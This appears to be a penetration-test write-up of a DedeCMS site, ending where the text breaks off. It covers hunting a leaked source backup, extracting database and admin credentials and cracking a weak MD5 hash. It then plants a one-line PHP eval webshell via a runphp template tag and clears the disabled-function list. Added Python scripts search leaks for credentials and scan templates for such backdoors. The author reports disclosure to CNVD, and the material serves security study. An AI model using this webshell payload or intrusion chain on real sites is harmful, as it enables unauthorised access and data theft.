
Title: Notes on a source-code leak leading to getshell (Part 1)


0x00 Introduction

All modifications made during this penetration test have been reverted, and the vulnerability has been submitted to the CNVD platform.

0x01 Source code leak

On a dark and windy night, with nothing to do, I was using Hunter to scan Internet sites for source code.

While going through the backup-file scan results, I spotted the prize.

[screenshot: backup file scan results]

Without a second thought, I downloaded it and got the source code!

Traces of DedeCMS can be seen in the comments.

[screenshot: DedeCMS traces in the source comments]

0x02 Sensitive information leakage

With the source code in hand, the first step is of course to hunt for sensitive information: a global search (Ctrl+Shift+F) for the keywords

key

pwd

passwd

password

1. Database information leak

[screenshot: database credentials in the source]

2. The backend administrator password is leaked

[screenshot: admin password hash in the source]

Trying to crack the MD5 hash succeeds; it is actually a weak password.

[screenshot: MD5 lookup result]
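The two steps above, the keyword sweep through the leaked tree and the weak-password check on the recovered hash, as an added example (my code, not the original poster's). It assumes DedeCMS stores the admin password as a 20-character slice of MD5, substr(md5(pwd), 5, 20), and tries both that slice and plain 32-character MD5; the source tree, the wordlist and the "leaked" hash are all constructed for the demo.

```python
"""Hunt for credentials in a leaked source tree and test recovered MD5 hashes.

Added example, not code from the original post. Part 1 automates the global
keyword search (key / pwd / passwd / password) described above; part 2 tries a
small wordlist against recovered hashes. It assumes DedeCMS stores the admin
password as a 20-character slice of MD5, substr(md5(pwd), 5, 20), and tries
both that slice and plain 32-character MD5. The source tree, the wordlist and
the hash below are all constructed for the demo.
"""
import hashlib
import os
import re
import tempfile

KEYWORDS = ("key", "pwd", "passwd", "password")

# An assignment-like line whose variable/key name contains one of the keywords
# and whose value is a short quoted literal, e.g.  $cfg_dbpwd = 'root123';
CRED_RE = re.compile(
    r"(?P<name>\$?\w*(?:" + "|".join(KEYWORDS) + r")\w*)"
    r"""\s*(?:=>|=|:)\s*['"](?P<value>[^'"]{1,64})['"]""",
    re.IGNORECASE,
)
# 32-hex (plain MD5) or 20-hex (assumed DedeCMS admin slice) tokens.
HASH_RE = re.compile(r"\b(?:[0-9a-f]{32}|[0-9a-f]{20})\b", re.IGNORECASE)

# Constructed tiny wordlist; a real run would use a proper weak-password list.
WEAK_WORDS = ["123456", "admin", "admin123", "admin888", "password", "root", "root123"]

# Constructed "leaked" admin hash in the assumed DedeCMS slice format.
DEMO_ADMIN_HASH = hashlib.md5(b"admin888").hexdigest()[5:25]


def _iter_files(root):
    for dirpath, _, files in os.walk(root):
        for fn in files:
            yield os.path.join(dirpath, fn)


def find_credentials(root):
    """Return (relative path, line number, name, value) for every credential-looking assignment."""
    hits = []
    for path in _iter_files(root):
        with open(path, encoding="utf-8", errors="ignore") as fh:
            for lineno, line in enumerate(fh, 1):
                for m in CRED_RE.finditer(line):
                    hits.append((os.path.relpath(path, root), lineno, m.group("name"), m.group("value")))
    return hits


def find_hashes(root):
    """Return the set of MD5-looking tokens (32 or 20 hex chars) found anywhere in the tree."""
    found = set()
    for path in _iter_files(root):
        with open(path, encoding="utf-8", errors="ignore") as fh:
            found.update(h.lower() for h in HASH_RE.findall(fh.read()))
    return found


def crack_md5(candidate, wordlist):
    """Return the plaintext whose MD5 (full or 20-char slice) equals candidate, else None."""
    candidate = candidate.lower()
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        if candidate in (digest, digest[5:25]):
            return word
    return None


def build_demo_tree():
    """Write a constructed DedeCMS-style config and SQL dump into a temp dir; returns its path."""
    root = tempfile.mkdtemp(prefix="leak_")
    os.makedirs(os.path.join(root, "data"))
    with open(os.path.join(root, "data", "common.inc.php"), "w") as fh:
        fh.write("<?php\n$cfg_dbhost = 'localhost';\n$cfg_dbname = 'dedecmsv57';\n"
                 "$cfg_dbuser = 'root';\n$cfg_dbpwd = 'root123';\n")
    with open(os.path.join(root, "backup.sql"), "w") as fh:
        fh.write("INSERT INTO `dede_admin` VALUES (1,10,'admin','%s','admin');\n" % DEMO_ADMIN_HASH)
    return root


def run_demo():
    """Tie the two steps together; returns {hash: plaintext-or-None} for the demo tree."""
    root = build_demo_tree()
    for hit in find_credentials(root):
        print("credential: %s:%d %s = %r" % hit)
    return {h: crack_md5(h, WEAK_WORDS) for h in find_hashes(root)}


if __name__ == "__main__":
    for h, plain in run_demo().items():
        print("hash %s -> %s" % (h, plain or "not in wordlist"))
```

Point it at a real leaked tree by calling find_credentials and find_hashes on the extracted directory instead of build_demo_tree; a hash that the wordlist does not recover comes back as None rather than being reported as cracked.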

With an account and password, the next thing is of course to find the backend management address. And with the source code in hand, isn't finding the backend address easy?

The backend address was found in the source (it had in fact been changed to 888).

[screenshot: backend address in the source]

After logging into the backend with the leaked admin/admin888, the version information showed DedeCMS SP1.

0x03 Historical Vulnerability

Having identified the CMS, the first step is of course to look at its historical vulnerabilities.

The historical SP1 vulnerabilities I found are all remote inclusion vulnerabilities, but this site has deleted the key file install.php (it does not exist in the source code).

Hoping to get lucky, I tried accessing it anyway (maybe it had been added back later). It does not exist, so I could only go on looking at other functional points.

I then also tried many SP2 vulnerabilities, but all of them failed.

Continued testing other points.

Continuing to look around, I found that System Settings - System Basic Parameters - Other Options contains the template engine's disabled-function list.

[screenshot: template engine disabled-function option]

But why would he disable the template engine's functions?

With this question in mind I went back to the source code.

Sure enough, the template-related file turned up again (meaning the functional entry point is hidden, but the file is still there).

[screenshot: template file in the source]

I tried accessing it: it is reachable and runs normally.

[screenshot: template page accessible]

Then it's easy. Following the DedeCMS template rules, write the payload into a backend template, then access the page to execute the PHP code.

{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}

// Calling method: [field:fieldname/]; the key here is runphp='yes'

// The PHP code is a one-line webshell; then delete all the disabled functions in Other Options and save

[screenshot: template edited with the payload]
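The defender's side of the step above, as an added example (my code, not the original poster's): a scanner that finds {dede:...} tags carrying runphp='yes' and flags the ones that call a dangerous function on request data, as the posted payload does, plus a check that the "disable functions" setting has not been emptied the way the post describes. The baseline function list, the config variable name $cfg_disable_funs, the sample template and the config fragment are assumptions constructed for the demo, not copied from a real DedeCMS install.

```python
"""Audit DedeCMS templates for runphp backdoors and a cleared disable-function list.

Added example, not code from the original post. (1) scan_template finds paired
{dede:...} tags with runphp='yes' and rates them by the functions they call and
whether they read request data; (2) missing_disabled_functions compares the
site's disable-function setting against a baseline so a cleared list stands out.
BASELINE_DISABLED, the $cfg_disable_funs variable name, SAMPLE_TEMPLATE and
SAMPLE_CONFIG are assumptions constructed for the demo.
"""
import re

# Assumed baseline of functions that should stay disabled for runphp templates.
BASELINE_DISABLED = {
    "phpinfo", "eval", "assert", "exec", "passthru", "shell_exec", "system",
    "proc_open", "popen", "fopen", "fwrite", "file_put_contents", "show_source",
}

# Paired tag with attributes and body: {dede:field name='x' runphp='yes'}...{/dede:field}
TAG_RE = re.compile(r"\{dede:(?P<tag>\w+)(?P<attrs>[^}]*)\}(?P<body>.*?)\{/dede:(?P=tag)\}", re.S | re.I)
RUNPHP_RE = re.compile(r"""runphp\s*=\s*['"]?\s*yes""", re.I)
CALL_RE = re.compile(r"@?\b([A-Za-z_]\w*)\s*\(")           # function-call names in the body
INPUT_RE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|SERVER|FILES)\b")
DISABLE_FUNS_RE = re.compile(r"""\$cfg_disable_funs\s*=\s*['"]([^'"]*)['"]""")

# Constructed sample template: line 2 mirrors the posted payload, line 3 is a benign runphp use.
SAMPLE_TEMPLATE = """{dede:global.cfg_webname/}
<div class="source">{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}</div>
<h1>{dede:field name='title' runphp='yes'}@me = strtoupper(@me);{/dede:field}</h1>
{dede:field name='pubdate' function='MyDate("Y-m-d",@me)'/}
"""

# Constructed config fragment with almost the whole list removed, as the post describes doing.
SAMPLE_CONFIG = "<?php\n$cfg_disable_funs = 'phpinfo';\n"


def scan_template(text):
    """Return one finding per runphp='yes' tag, ordered by position in the template."""
    findings = []
    for m in TAG_RE.finditer(text):
        if not RUNPHP_RE.search(m.group("attrs")):
            continue
        body = m.group("body")
        calls = {c.lower() for c in CALL_RE.findall(body)}
        risky = sorted(calls & BASELINE_DISABLED)
        tainted = bool(INPUT_RE.search(body))
        if risky and tainted:
            severity = "critical"   # dangerous function fed from the request: a webshell
        elif risky:
            severity = "high"
        else:
            severity = "review"     # runphp may be legitimate but still deserves a look
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "tag": m.group("tag"),
            "functions": risky,
            "user_input": tainted,
            "severity": severity,
            "snippet": body.strip()[:80],
        })
    return findings


def missing_disabled_functions(config_text):
    """Parse $cfg_disable_funs from a config fragment; return baseline entries that are absent."""
    m = DISABLE_FUNS_RE.search(config_text)
    configured = {f.strip().lower() for f in m.group(1).split(",") if f.strip()} if m else set()
    return sorted(BASELINE_DISABLED - configured)


if __name__ == "__main__":
    for f in scan_template(SAMPLE_TEMPLATE):
        print("line %(line)d [%(severity)s] dede:%(tag)s calls=%(functions)s "
              "input=%(user_input)s :: %(snippet)s" % f)
    print("disable-function entries missing from config:", missing_disabled_functions(SAMPLE_CONFIG))
```

Run scan_template over every .htm under the templets directory of a suspect install and diff missing_disabled_functions against what the backend shows; a self-closing tag such as {dede:field name='pubdate' .../} carries no body and is deliberately not matched.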

Because it is injected into index.htm, the URL for connecting to the webshell is the home page:

http://
